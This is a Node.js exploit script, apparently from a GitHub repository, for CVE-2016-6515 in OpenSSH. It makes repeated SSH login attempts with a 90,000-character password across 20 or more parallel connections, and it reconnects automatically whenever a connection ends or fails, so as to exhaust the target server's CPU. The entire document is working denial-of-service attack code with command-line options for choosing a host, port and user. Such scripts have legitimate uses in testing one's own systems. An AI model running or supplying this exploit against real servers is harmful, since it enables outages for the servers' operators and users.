README.md
Rendering markdown...
#!/usr/bin/env node
/*
* CVE-2016-6515 exploit by opsxcq
*/
var Client = require('ssh2').Client;
var program = require('commander');
function usage(){
console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}
var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
buffer = buffer + pattern;
}
function exploit(host, port, user){
var conn = new Client();
conn//
.on('end', function() {
// Again
exploit(host, port, user);
})//
.on('close', function(err) {
// Again
if(!err){
exploit(host, port, user);
}
})//
.on('error', function(){
exploit(host, port, user);
}) //
.connect({
host: host,
port: port,
username: user,
password: buffer
});
}
program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);
if (!program.port){
usage();
return -1;
}
if (!program.user){
usage();
return -1;
}
if (!program.host){
usage();
return -1;
}
var instances = 20;
if(program.instances){
instances = program.instances;
}
try{
console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
for(var i=0; i < instances; i++){
exploit(program.host, program.port, program.user);
}
}catch(e){
console.log("[-] Exception: "+e);
}